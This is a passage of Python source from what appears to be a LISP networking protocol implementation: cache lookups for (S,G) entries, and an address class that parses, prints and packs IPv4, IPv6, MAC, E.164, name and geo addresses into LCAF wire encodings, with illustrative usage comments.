    mc = mc.lookup_source_cache(source, False)
    if (mc == None):
        eid_str = source.print_sg(dest)
        dprint("Lookup for EID {} not found in map-cache".format(eid_str))
        return(None)

    prefix_str = green(mc.print_eid_tuple(), False)
    dprint("Lookup for EID {} found map-cache entry {}".format(
        green(source.print_sg(dest), False), prefix_str))
    return(mc)

def lisp_referral_cache_lookup(eid, group, exact):
    if (group and group.is_null()):
        referral = lisp_referral_cache.lookup_cache(eid, exact)
        return(referral)

    #
    # No unicast EID supplied for an (S,G) lookup.
    #
    if (eid == None or eid.is_null()): return(None)

    #
    # For (S,G), look up G first, then S in the group entry's source-cache.
    #
    referral = lisp_referral_cache.lookup_cache(group, exact)
    if (referral == None): return(None)

    source_referral = referral.lookup_source_cache(eid, exact)
    if (source_referral): return(source_referral)

    if (exact): referral = None
    return(referral)

def lisp_ddt_cache_lookup(eid, group, exact):
    if (group.is_null()):
        ddt = lisp_ddt_cache.lookup_cache(eid, exact)
        return(ddt)

    #
    # No unicast EID supplied for an (S,G) lookup.
    #
    if (eid.is_null()): return(None)

    #
    # For (S,G), look up G first, then S in the group entry's source-cache.
    #
    ddt = lisp_ddt_cache.lookup_cache(group, exact)
    if (ddt == None): return(None)

    source_ddt = ddt.lookup_source_cache(eid, exact)
    if (source_ddt): return(source_ddt)

    if (exact): ddt = None
    return(ddt)

def lisp_site_eid_lookup(eid, group, exact):

    if (group.is_null()):
        site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
        return(site_eid)

    #
    # No unicast EID supplied for an (S,G) lookup.
    #
    if (eid.is_null()): return(None)

    #
    # For (S,G), look up G first, then S in the group entry's source-cache.
    #
    site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
    if (site_eid == None): return(None)

    #
    # Look for the source inside of the group entry. When an exact lookup
    # fails, a longest match can still be satisfied by a parent entry that
    # was configured to accept more-specifics.
    #
    source_site = site_eid.lookup_source_cache(eid, exact)
    if (source_site): return(source_site)

    if (exact):
        site_eid = None
    else:
        parent = site_eid.parent_for_more_specifics
        if (parent and parent.accept_more_specifics):
            if (group.is_more_specific(parent.group)): site_eid = parent
    return(site_eid)
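
#
# All three (S,G) lookups above follow the same two-stage pattern: find the
# group entry first, then find the source inside that entry's source-cache.
# A sketch of the pattern (hypothetical entry objects, illustrative only):
#
#   g_entry = lisp_sites_by_eid.lookup_cache(group, False)
#   if (g_entry != None):
#       s_entry = g_entry.lookup_source_cache(eid, False)
#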

class lisp_address(object):
    def __init__(self, afi, addr_str, mask_len, iid):
        self.afi = afi
        self.mask_len = mask_len
        self.instance_id = iid
        self.iid_list = []
        self.address = 0
        if (addr_str != ""): self.store_address(addr_str)

    def copy_address(self, addr):
        if (addr == None): return
        self.afi = addr.afi
        self.address = addr.address
        self.mask_len = addr.mask_len
        self.instance_id = addr.instance_id
        self.iid_list = addr.iid_list

    def make_default_route(self, addr):
        self.afi = addr.afi
        self.instance_id = addr.instance_id
        self.mask_len = 0
        self.address = 0

    def make_default_multicast_route(self, addr):
        self.afi = addr.afi
        self.instance_id = addr.instance_id
        if (self.afi == LISP_AFI_IPV4):
            self.address = 0xe0000000
            self.mask_len = 4
        if (self.afi == LISP_AFI_IPV6):
            self.address = 0xff << 120
            self.mask_len = 8
        if (self.afi == LISP_AFI_MAC):
            self.address = 0xffffffffffff
            self.mask_len = 48

    def not_set(self):
        return(self.afi == LISP_AFI_NONE)

    def is_private_address(self):
        if (self.is_ipv4() == False): return(False)
        addr = self.address
        if (((addr & 0xff000000) >> 24) == 10): return(True)
        if (((addr & 0xff000000) >> 24) == 172):
            byte2 = (addr & 0x00ff0000) >> 16
            if (byte2 >= 16 and byte2 <= 31): return(True)
        if (((addr & 0xffff0000) >> 16) == 0xc0a8): return(True)
        return(False)

    def is_multicast_address(self):
        if (self.is_ipv4()): return(self.is_ipv4_multicast())
        if (self.is_ipv6()): return(self.is_ipv6_multicast())
        if (self.is_mac()): return(self.is_mac_multicast())
        return(False)

    def host_mask_len(self):
        if (self.afi == LISP_AFI_IPV4): return(LISP_IPV4_HOST_MASK_LEN)
        if (self.afi == LISP_AFI_IPV6): return(LISP_IPV6_HOST_MASK_LEN)
        if (self.afi == LISP_AFI_MAC): return(LISP_MAC_HOST_MASK_LEN)
        if (self.afi == LISP_AFI_E164): return(LISP_E164_HOST_MASK_LEN)
        if (self.afi == LISP_AFI_NAME): return(len(self.address) * 8)
        if (self.afi == LISP_AFI_GEO_COORD):
            return(len(self.address.print_geo()) * 8)
        return(0)

    def is_iana_eid(self):
        if (self.is_ipv6() == False): return(False)
        addr = self.address >> 96
        return(addr == 0x20010005)

    def addr_length(self):
        if (self.afi == LISP_AFI_IPV4): return(4)
        if (self.afi == LISP_AFI_IPV6): return(16)
        if (self.afi == LISP_AFI_MAC): return(6)
        if (self.afi == LISP_AFI_E164): return(8)
        if (self.afi == LISP_AFI_LCAF): return(0)
        if (self.afi == LISP_AFI_NAME): return(len(self.address) + 1)
        if (self.afi == LISP_AFI_IID_RANGE): return(4)
        if (self.afi == LISP_AFI_GEO_COORD):
            return(len(self.address.print_geo()))
        return(0)

    def afi_to_version(self):
        if (self.afi == LISP_AFI_IPV4): return(4)
        if (self.afi == LISP_AFI_IPV6): return(6)
        return(0)

    def packet_format(self):

        #
        # struct formats used to encode each address family on the wire;
        # byte-swapping to and from network order is done by the callers.
        #
        if (self.afi == LISP_AFI_IPV4): return("I")
        if (self.afi == LISP_AFI_IPV6): return("QQ")
        if (self.afi == LISP_AFI_MAC): return("HHH")
        if (self.afi == LISP_AFI_E164): return("II")
        if (self.afi == LISP_AFI_LCAF): return("I")
        return("")

    def pack_address(self):
        fmt = self.packet_format()
        packet = b""
        if (self.is_ipv4()):
            packet = struct.pack(fmt, socket.htonl(self.address))
        elif (self.is_ipv6()):
            upper = byte_swap_64(self.address >> 64)
            lower = byte_swap_64(self.address & 0xffffffffffffffff)
            packet = struct.pack(fmt, upper, lower)
        elif (self.is_mac()):
            addr = self.address
            word0 = (addr >> 32) & 0xffff
            word1 = (addr >> 16) & 0xffff
            word2 = addr & 0xffff
            packet = struct.pack(fmt, word0, word1, word2)
        elif (self.is_e164()):
            addr = self.address
            upper = (addr >> 32) & 0xffffffff
            lower = (addr & 0xffffffff)
            packet = struct.pack(fmt, upper, lower)
        elif (self.is_dist_name()):
            packet += (self.address + "\0").encode()
        return(packet)

    def unpack_address(self, packet):
        fmt = self.packet_format()
        size = struct.calcsize(fmt)
        if (len(packet) < size): return(None)

        addr = struct.unpack(fmt, packet[:size])

        if (self.is_ipv4()):
            self.address = socket.ntohl(addr[0])

        elif (self.is_ipv6()):

            #
            # Quirk preserved from the original code: a small first quadword
            # with a clear low byte is shifted into place rather than
            # byte-swapped.
            #
            if (addr[0] <= 0xffff and (addr[0] & 0xff) == 0):
                upper = (addr[0] << 48) << 64
            else:
                upper = byte_swap_64(addr[0]) << 64
            lower = byte_swap_64(addr[1])
            self.address = upper | lower

        elif (self.is_mac()):
            word0 = addr[0]
            word1 = addr[1]
            word2 = addr[2]
            self.address = (word0 << 32) + (word1 << 16) + word2

        elif (self.is_e164()):
            self.address = (addr[0] << 32) + addr[1]

        elif (self.is_dist_name()):
            packet, self.address = lisp_decode_dist_name(packet)
            self.mask_len = len(self.address) * 8
            size = 0

        packet = packet[size::]
        return(packet)
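
    #
    # Usage sketch (illustrative only): pack_address()/unpack_address()
    # round-trip an IPv4 address through network byte-order:
    #
    #   a = lisp_address(LISP_AFI_IPV4, "192.0.2.1", 32, 0)
    #   b = lisp_address(LISP_AFI_IPV4, "", 0, 0)
    #   b.unpack_address(a.pack_address())
    #   assert b.print_address_no_iid() == "192.0.2.1"
    #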

    def is_ipv4(self):
        return(True if (self.afi == LISP_AFI_IPV4) else False)

    def is_ipv4_link_local(self):
        if (self.is_ipv4() == False): return(False)
        return(((self.address >> 16) & 0xffff) == 0xa9fe)

    def is_ipv4_loopback(self):
        if (self.is_ipv4() == False): return(False)
        return(self.address == 0x7f000001)

    def is_ipv4_multicast(self):
        if (self.is_ipv4() == False): return(False)
        return(((self.address >> 24) & 0xf0) == 0xe0)

    def is_ipv4_string(self, addr_str):
        return(addr_str.find(".") != -1)

    def is_ipv6(self):
        return(True if (self.afi == LISP_AFI_IPV6) else False)

    def is_ipv6_link_local(self):
        if (self.is_ipv6() == False): return(False)
        return(((self.address >> 112) & 0xffff) == 0xfe80)

    def is_ipv6_string_link_local(self, addr_str):
        return(addr_str.find("fe80::") != -1)

    def is_ipv6_loopback(self):
        if (self.is_ipv6() == False): return(False)
        return(self.address == 1)

    def is_ipv6_multicast(self):
        if (self.is_ipv6() == False): return(False)
        return(((self.address >> 120) & 0xff) == 0xff)

    def is_ipv6_string(self, addr_str):
        return(addr_str.find(":") != -1)

    def is_mac(self):
        return(True if (self.afi == LISP_AFI_MAC) else False)

    def is_mac_multicast(self):
        if (self.is_mac() == False): return(False)
        return((self.address & 0x010000000000) != 0)

    def is_mac_broadcast(self):
        if (self.is_mac() == False): return(False)
        return(self.address == 0xffffffffffff)

    def is_mac_string(self, addr_str):
        return(len(addr_str) == 15 and addr_str.find("-") != -1)

    def is_link_local_multicast(self):
        if (self.is_ipv4()):
            return((0xe0ffff00 & self.address) == 0xe0000000)
        if (self.is_ipv6()):
            return((self.address >> 112) & 0xffff == 0xff02)
        return(False)

    def is_null(self):
        return(True if (self.afi == LISP_AFI_NONE) else False)

    def is_ultimate_root(self):
        return(True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)

    def is_iid_range(self):
        return(True if self.afi == LISP_AFI_IID_RANGE else False)

    def is_e164(self):
        return(True if (self.afi == LISP_AFI_E164) else False)

    def is_dist_name(self):
        return(True if (self.afi == LISP_AFI_NAME) else False)

    def is_geo_prefix(self):
        return(True if (self.afi == LISP_AFI_GEO_COORD) else False)

    def is_binary(self):
        if (self.is_dist_name()): return(False)
        if (self.is_geo_prefix()): return(False)
        return(True)

    def store_address(self, addr_str):
        if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)

        #
        # Parse an optional instance-id in "[<iid>]<address>" format.
        #
        left = addr_str.find("[")
        right = addr_str.find("]")
        if (left != -1 and right != -1):
            self.instance_id = int(addr_str[left+1:right])
            addr_str = addr_str[right+1::]
            if (self.is_dist_name() == False):
                addr_str = addr_str.replace(" ", "")

        #
        # Store the address field by address family.
        #
        if (self.is_ipv4()):
            octets = addr_str.split(".")
            value = int(octets[0]) << 24
            value += int(octets[1]) << 16
            value += int(octets[2]) << 8
            value += int(octets[3])
            self.address = value
        elif (self.is_ipv6()):

            #
            # Quirk preserved from the original code: when the address
            # starts with a 2-character group followed by "::", the first
            # two bytes of the hexlified string are swapped below.
            #
            swap = (addr_str[2:4] == "::")
            try:
                addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
            except:
                addr_str = socket.inet_pton(socket.AF_INET6, "0::0")
            addr_str = binascii.hexlify(addr_str)

            if (swap):
                addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]
            self.address = int(addr_str, 16)

        elif (self.is_geo_prefix()):
            geo = lisp_geo(None)
            geo.name = "geo-prefix-{}".format(geo)
            geo.parse_geo_string(addr_str)
            self.address = geo
        elif (self.is_mac()):
            addr_str = addr_str.replace("-", "")
            value = int(addr_str, 16)
            self.address = value
        elif (self.is_e164()):
            addr_str = addr_str[1::]
            value = int(addr_str, 16)
            self.address = value << 4
        elif (self.is_dist_name()):
            self.address = addr_str.replace("'", "")
        self.mask_len = self.host_mask_len()

    def store_prefix(self, prefix_str):
        if (self.is_geo_string(prefix_str)):
            index = prefix_str.find("]")
            mask_len = len(prefix_str[index+1::]) * 8
        elif (prefix_str.find("/") != -1):
            prefix_str, mask_len = prefix_str.split("/")
        else:
            left = prefix_str.find("'")
            if (left == -1): return
            right = prefix_str.find("'", left+1)
            if (right == -1): return
            mask_len = len(prefix_str[left+1:right]) * 8

        self.string_to_afi(prefix_str)
        self.store_address(prefix_str)
        self.mask_len = int(mask_len)

    def zero_host_bits(self):
        if (self.mask_len < 0): return
        mask = (2 ** self.mask_len) - 1
        shift = self.addr_length() * 8 - self.mask_len
        mask <<= shift
        self.address &= mask
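
    #
    # Usage sketch (illustrative only): store_prefix() parses an optional
    # "[<iid>]" prefix plus a mask-length, store_address() does the rest:
    #
    #   p = lisp_address(LISP_AFI_NONE, "", 0, 0)
    #   p.store_prefix("[1000]10.1.0.0/16")
    #   assert p.instance_id == 1000 and p.mask_len == 16
    #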

    def is_geo_string(self, addr_str):
        index = addr_str.find("]")
        if (index != -1): addr_str = addr_str[index+1::]

        geo = addr_str.split("/")
        if (len(geo) == 2):
            if (geo[1].isdigit() == False): return(False)

        geo = geo[0]
        geo = geo.split("-")
        count = len(geo)
        if (count < 8 or count > 9): return(False)

        for i in range(0, count):
            if (i == 3):
                if (geo[i] in ["N", "S"]): continue
                return(False)
            if (i == 7):
                if (geo[i] in ["W", "E"]): continue
                return(False)
            if (geo[i].isdigit() == False): return(False)
        return(True)

    def string_to_afi(self, addr_str):
        if (addr_str.count("'") == 2):
            self.afi = LISP_AFI_NAME
            return
        if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
        elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
        elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
        elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
        elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
        else: self.afi = LISP_AFI_NONE

    def print_address(self):
        addr = self.print_address_no_iid()
        iid = "[" + str(self.instance_id)
        for i in self.iid_list: iid += "," + str(i)
        iid += "]"
        addr = "{}{}".format(iid, addr)
        return(addr)

    def print_address_no_iid(self):
        if (self.is_ipv4()):
            addr = self.address
            byte1 = addr >> 24
            byte2 = (addr >> 16) & 0xff
            byte3 = (addr >> 8) & 0xff
            byte4 = addr & 0xff
            return("{}.{}.{}.{}".format(byte1, byte2, byte3, byte4))
        elif (self.is_ipv6()):
            addr_str = lisp_hex_string(self.address).zfill(32)
            addr_str = binascii.unhexlify(addr_str)
            addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
            return("{}".format(addr_str))
        elif (self.is_geo_prefix()):
            return("{}".format(self.address.print_geo()))
        elif (self.is_mac()):
            addr_str = lisp_hex_string(self.address).zfill(12)
            addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
                addr_str[8:12])
            return("{}".format(addr_str))
        elif (self.is_e164()):
            addr_str = lisp_hex_string(self.address).zfill(15)
            return("+{}".format(addr_str))
        elif (self.is_dist_name()):
            return("'{}'".format(self.address))
        elif (self.is_null()):
            return("no-address")
        return("unknown-afi:{}".format(self.afi))

    def print_prefix(self):
        if (self.is_ultimate_root()): return("[*]")
        if (self.is_iid_range()):
            if (self.mask_len == 32): return("[{}]".format(self.instance_id))
            upper = self.instance_id + (2 ** (32 - self.mask_len) - 1)
            return("[{}-{}]".format(self.instance_id, upper))

        addr = self.print_address()
        if (self.is_dist_name()): return(addr)
        if (self.is_geo_prefix()): return(addr)

        index = addr.find("no-address")
        if (index == -1):
            addr = "{}/{}".format(addr, str(self.mask_len))
        else:
            addr = addr[0:index]
        return(addr)

    def print_prefix_no_iid(self):
        addr = self.print_address_no_iid()
        if (self.is_dist_name()): return(addr)
        if (self.is_geo_prefix()): return(addr)
        return("{}/{}".format(addr, str(self.mask_len)))

    def print_prefix_url(self):
        if (self.is_ultimate_root()): return("0--0")
        addr = self.print_address()
        index = addr.find("]")
        if (index != -1): addr = addr[index+1::]
        if (self.is_geo_prefix()):
            addr = addr.replace("/", "-")
            return("{}-{}".format(self.instance_id, addr))
        return("{}-{}-{}".format(self.instance_id, addr, self.mask_len))

    def print_sg(self, g):
        s = self.print_prefix()
        s_index = s.find("]") + 1
        g = g.print_prefix()
        g_index = g.find("]") + 1
        sg_str = "[{}]({}, {})".format(self.instance_id, s[s_index::],
            g[g_index::])
        return(sg_str)
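
    #
    # Usage sketch (illustrative only) for the print methods:
    #
    #   s = lisp_address(LISP_AFI_NONE, "", 0, 0)
    #   s.store_prefix("[2]10.0.0.1/32")
    #   g = lisp_address(LISP_AFI_NONE, "", 0, 0)
    #   g.store_prefix("[2]224.1.1.1/32")
    #   s.print_sg(g)   # -> "[2](10.0.0.1/32, 224.1.1.1/32)"
    #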

    def hash_address(self, addr):
        addr1 = self.address
        addr2 = addr.address

        if (self.is_geo_prefix()): addr1 = self.address.print_geo()
        if (addr.is_geo_prefix()): addr2 = addr.address.print_geo()

        if (type(addr1) == str):
            addr1 = int(binascii.hexlify(addr1[0:1]))
        if (type(addr2) == str):
            addr2 = int(binascii.hexlify(addr2[0:1]))
        return(addr1 ^ addr2)

    #
    # is_more_specific() returns True when self is equal to or more
    # specific than the supplied prefix.
    #
    def is_more_specific(self, prefix):
        if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)

        mask_len = prefix.mask_len
        if (prefix.afi == LISP_AFI_IID_RANGE):
            size = 2 ** (32 - mask_len)
            lower = prefix.instance_id
            upper = lower + size
            return(self.instance_id in range(lower, upper))

        if (self.instance_id != prefix.instance_id): return(False)
        if (self.afi != prefix.afi):
            if (prefix.afi != LISP_AFI_NONE): return(False)

        #
        # Non-binary addresses (distinguished-names and geo-prefixes)
        # compare as strings.
        #
        if (self.is_binary() == False):
            if (prefix.afi == LISP_AFI_NONE): return(True)
            if (type(self.address) != type(prefix.address)): return(False)
            addr = self.address
            paddr = prefix.address
            if (self.is_geo_prefix()):
                addr = self.address.print_geo()
                paddr = prefix.address.print_geo()
            if (len(addr) < len(paddr)): return(False)
            return(addr.find(paddr) == 0)

        #
        # Binary addresses compare under the prefix's mask.
        #
        if (self.mask_len < mask_len): return(False)

        shift = (prefix.addr_length() * 8) - mask_len
        mask = (2 ** mask_len - 1) << shift
        return((self.address & mask) == prefix.address)

    def mask_address(self, mask_len):
        shift = (self.addr_length() * 8) - mask_len
        mask = (2 ** mask_len - 1) << shift
        self.address &= mask
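
    #
    # Usage sketch (illustrative only): a /16 inside a /8 is more specific,
    # but not the other way around:
    #
    #   p8 = lisp_address(LISP_AFI_NONE, "", 0, 0)
    #   p8.store_prefix("[0]10.0.0.0/8")
    #   p16 = lisp_address(LISP_AFI_NONE, "", 0, 0)
    #   p16.store_prefix("[0]10.1.0.0/16")
    #   assert p16.is_more_specific(p8) == True
    #   assert p8.is_more_specific(p16) == False
    #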

    def is_exact_match(self, prefix):
        if (self.instance_id != prefix.instance_id): return(False)
        p1 = self.print_prefix()
        p2 = prefix.print_prefix() if prefix else ""
        return(p1 == p2)

    def is_local(self):
        if (self.is_ipv4()):
            rloc = lisp_myrlocs[0]
            if (rloc == None): return(False)
            rloc = rloc.print_address_no_iid()
            return(self.print_address_no_iid() == rloc)
        if (self.is_ipv6()):
            rloc = lisp_myrlocs[1]
            if (rloc == None): return(False)
            rloc = rloc.print_address_no_iid()
            return(self.print_address_no_iid() == rloc)
        return(False)

    def store_iid_range(self, iid, mask_len):
        if (self.afi == LISP_AFI_NONE):
            if (iid == 0 and mask_len == 0): self.afi = LISP_AFI_ULTIMATE_ROOT
            else: self.afi = LISP_AFI_IID_RANGE

        self.instance_id = iid
        self.mask_len = mask_len

    def lcaf_length(self, lcaf_type):
        length = self.addr_length() + 2
        if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
        if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
        if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
        if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
        if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
        if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
        if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
        return(length)

    def lcaf_encode_iid(self):
        lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
        addr_length = socket.htons(self.lcaf_length(lcaf_type))
        iid = self.instance_id
        afi = self.afi
        ml = 0
        if (afi < 0):
            if (self.afi == LISP_AFI_GEO_COORD):
                afi = LISP_AFI_LCAF
                ml = 0
            else:
                afi = 0
                ml = self.mask_len

        lcaf = struct.pack("BBBBH", 0, 0, lcaf_type, ml, addr_length)
        lcaf += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
        if (afi == 0): return(lcaf)

        if (self.afi == LISP_AFI_GEO_COORD):
            lcaf = lcaf[0:-2]
            lcaf += self.address.encode_geo()
            return(lcaf)

        lcaf += self.pack_address()
        return(lcaf)
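
    #
    # Usage sketch (illustrative only): encode an EID into an Instance-ID
    # LCAF and decode it back:
    #
    #   e = lisp_address(LISP_AFI_NONE, "", 0, 0)
    #   e.store_prefix("[7]192.0.2.0/24")
    #   d = lisp_address(LISP_AFI_NONE, "", 0, 0)
    #   d.lcaf_decode_iid(e.lcaf_encode_iid())
    #   assert d.instance_id == 7
    #   assert d.print_address_no_iid() == "192.0.2.0"
    #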

    def lcaf_decode_iid(self, packet):
        fmt = "BBBBH"
        size = struct.calcsize(fmt)
        if (len(packet) < size): return(None)

        rsvd1, flags, lcaf_type, iid_ml, length = struct.unpack(fmt,
            packet[:size])
        packet = packet[size::]

        if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)

        fmt = "IH"
        size = struct.calcsize(fmt)
        if (len(packet) < size): return(None)

        iid, afi = struct.unpack(fmt, packet[:size])
        packet = packet[size::]

        length = socket.ntohs(length)
        self.instance_id = socket.ntohl(iid)
        afi = socket.ntohs(afi)
        self.afi = afi
        if (iid_ml != 0 and afi == 0): self.mask_len = iid_ml
        if (afi == 0):
            self.afi = LISP_AFI_IID_RANGE if iid_ml else LISP_AFI_ULTIMATE_ROOT

        #
        # No address is encoded after the instance-id.
        #
        if (afi == 0): return(packet)

        #
        # Distinguished-name encoding.
        #
        if (self.is_dist_name()):
            packet, self.address = lisp_decode_dist_name(packet)
            self.mask_len = len(self.address) * 8
            return(packet)

        #
        # Geo-coord LCAF nested inside the instance-id LCAF.
        #
        if (afi == LISP_AFI_LCAF):
            fmt = "BBBBH"
            size = struct.calcsize(fmt)
            if (len(packet) < size): return(None)

            rsvd1, rsvd2, lcaf_type, rsvd3, lcaf_len = struct.unpack(fmt,
                packet[:size])

            if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)

            lcaf_len = socket.ntohs(lcaf_len)
            packet = packet[size::]
            if (lcaf_len > len(packet)): return(None)

            geo = lisp_geo("")
            self.afi = LISP_AFI_GEO_COORD
            self.address = geo
            packet = geo.decode_geo(packet, lcaf_len, rsvd3)
            self.mask_len = self.host_mask_len()
            return(packet)

        addr_length = self.addr_length()
        if (len(packet) < addr_length): return(None)

        packet = self.unpack_address(packet)
        return(packet)

    def lcaf_encode_sg(self, group):
        lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
        iid = socket.htonl(self.instance_id)
        addr_length = socket.htons(self.lcaf_length(lcaf_type))
        lcaf = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, addr_length, iid,
            0, self.mask_len, group.mask_len)

        lcaf += struct.pack("H", socket.htons(self.afi))
        lcaf += self.pack_address()
        lcaf += struct.pack("H", socket.htons(group.afi))
        lcaf += group.pack_address()
        return(lcaf)

    def lcaf_decode_sg(self, packet):
        fmt = "BBBBHIHBB"
        size = struct.calcsize(fmt)
        if (len(packet) < size): return([None, None])

        rsvd1, flags, lcaf_type, rsvd2, length, iid, rsvd3, source_ml, \
            group_ml = struct.unpack(fmt, packet[:size])

        packet = packet[size::]

        if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])

        self.instance_id = socket.ntohl(iid)
        length = socket.ntohs(length) - 8

        #
        # Get source AFI and source address.
        #
        fmt = "H"
        size = struct.calcsize(fmt)
        if (len(packet) < size): return([None, None])
        if (length < size): return([None, None])

        afi = struct.unpack(fmt, packet[:size])[0]
        packet = packet[size::]
        length -= size
        self.afi = socket.ntohs(afi)
        self.mask_len = source_ml
        addr_length = self.addr_length()
        if (length < addr_length): return([None, None])

        packet = self.unpack_address(packet)
        if (packet == None): return([None, None])

        length -= addr_length

        #
        # Get group AFI and group address.
        #
        fmt = "H"
        size = struct.calcsize(fmt)
        if (len(packet) < size): return([None, None])
        if (length < size): return([None, None])

        afi = struct.unpack(fmt, packet[:size])[0]
        packet = packet[size::]
        length -= size
        group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        group.afi = socket.ntohs(afi)
        group.mask_len = group_ml
        group.instance_id = self.instance_id
        addr_length = self.addr_length()
        if (length < addr_length): return([None, None])

        packet = group.unpack_address(packet)
        if (packet == None): return([None, None])

        return([packet, group])
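
    #
    # Usage sketch (illustrative only): lcaf_encode_sg()/lcaf_decode_sg()
    # round-trip an (S,G) pair:
    #
    #   s = lisp_address(LISP_AFI_NONE, "", 0, 0)
    #   s.store_prefix("[2]10.0.0.1/32")
    #   g = lisp_address(LISP_AFI_NONE, "", 0, 0)
    #   g.store_prefix("[2]224.1.1.1/32")
    #   d = lisp_address(LISP_AFI_NONE, "", 0, 0)
    #   packet, dg = d.lcaf_decode_sg(s.lcaf_encode_sg(g))
    #   assert dg.print_address_no_iid() == "224.1.1.1"
    #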

    def lcaf_decode_eid(self, packet):
        fmt = "BBB"
        size = struct.calcsize(fmt)
        if (len(packet) < size): return([None, None])

        #
        # Peek at the LCAF type to decide which decoder to run. Do not
        # advance the packet pointer.
        #
        rsvd, flags, lcaf_type = struct.unpack(fmt, packet[:size])

        if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
            return([self.lcaf_decode_iid(packet), None])
        elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
            packet, group = self.lcaf_decode_sg(packet)
            return([packet, group])
        elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
            fmt = "BBBBH"
            size = struct.calcsize(fmt)
            if (len(packet) < size): return(None)

            rsvd1, rsvd2, lcaf_type, rsvd3, lcaf_len = struct.unpack(fmt,
                packet[:size])

            if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)

            lcaf_len = socket.ntohs(lcaf_len)
            packet = packet[size::]
            if (lcaf_len > len(packet)): return(None)

            geo = lisp_geo("")
            self.instance_id = 0
            self.afi = LISP_AFI_GEO_COORD
            self.address = geo
            packet = geo.decode_geo(packet, lcaf_len, rsvd3)
            self.mask_len = self.host_mask_len()

            return([packet, None])

class lisp_elp_node(object):
    def __init__(self):
        self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.probe = False
        self.strict = False
        self.eid = False
        self.we_are_last = False

    def copy_elp_node(self):
        elp_node = lisp_elp_node()
        elp_node.copy_address(self.address)
        elp_node.probe = self.probe
        elp_node.strict = self.strict
        elp_node.eid = self.eid
        elp_node.we_are_last = self.we_are_last
        return(elp_node)
class lisp_elp(object):
    def __init__(self, name):
        self.elp_name = name
        self.elp_nodes = []
        self.use_elp_node = None
        self.we_are_last = False

    def copy_elp(self):
        elp = lisp_elp(self.elp_name)
        elp.use_elp_node = self.use_elp_node
        elp.we_are_last = self.we_are_last
        for elp_node in self.elp_nodes:
            elp.elp_nodes.append(elp_node.copy_elp_node())
        return(elp)

    def print_elp(self, want_marker):
        elp_str = ""
        for elp_node in self.elp_nodes:
            marker = ""
            if (want_marker):
                if (elp_node == self.use_elp_node):
                    marker = "*"
                elif (elp_node.we_are_last):
                    marker = "x"

            elp_str += "{}{}({}{}{}), ".format(marker,
                elp_node.address.print_address_no_iid(),
                "r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
                "S" if elp_node.strict else "s")

        return(elp_str[0:-2] if elp_str != "" else "")

    def select_elp_node(self):
        ipv4, ipv6, device = lisp_myrlocs
        index = None

        #
        # Find our own RLOC in the ELP node list.
        #
        for elp_node in self.elp_nodes:
            if (ipv4 and elp_node.address.is_exact_match(ipv4)):
                index = self.elp_nodes.index(elp_node)
                break
            if (ipv6 and elp_node.address.is_exact_match(ipv6)):
                index = self.elp_nodes.index(elp_node)
                break

        #
        # No local match means we are an ITR, so forward to the first
        # ELP node.
        #
        if (index == None):
            self.use_elp_node = self.elp_nodes[0]
            elp_node.we_are_last = False
            return

        #
        # We matched the last ELP node, so we are the final hop.
        #
        if (self.elp_nodes[-1] == self.elp_nodes[index]):
            self.use_elp_node = None
            elp_node.we_are_last = True
            return

        #
        # Otherwise, forward to the node that follows us in the path.
        #
        self.use_elp_node = self.elp_nodes[index + 1]
        return

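#
# Illustrative sketch (not part of the original module): print_elp()
# renders each hop as "<address>(<r|R><P|p><S|s>)", upper-case meaning the
# flag is clear for eid and set for probe/strict, with "*" marking the
# node this system forwards to and "x" marking this system's own hop:
#
#   "*1.1.1.1(RpS), 2.2.2.2(Rps)"
#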
class lisp_geo(object):
    def __init__(self, name):
        self.geo_name = name
        self.latitude = 0xffffffff
        self.lat_mins = 0
        self.lat_secs = 0
        self.longitude = 0xffffffff
        self.long_mins = 0
        self.long_secs = 0
        self.altitude = -1
        self.radius = 0

    def copy_geo(self):
        geo = lisp_geo(self.geo_name)
        geo.latitude = self.latitude
        geo.lat_mins = self.lat_mins
        geo.lat_secs = self.lat_secs
        geo.longitude = self.longitude
        geo.long_mins = self.long_mins
        geo.long_secs = self.long_secs
        geo.altitude = self.altitude
        geo.radius = self.radius
        return(geo)

    def no_geo_altitude(self):
        return(self.altitude == -1)

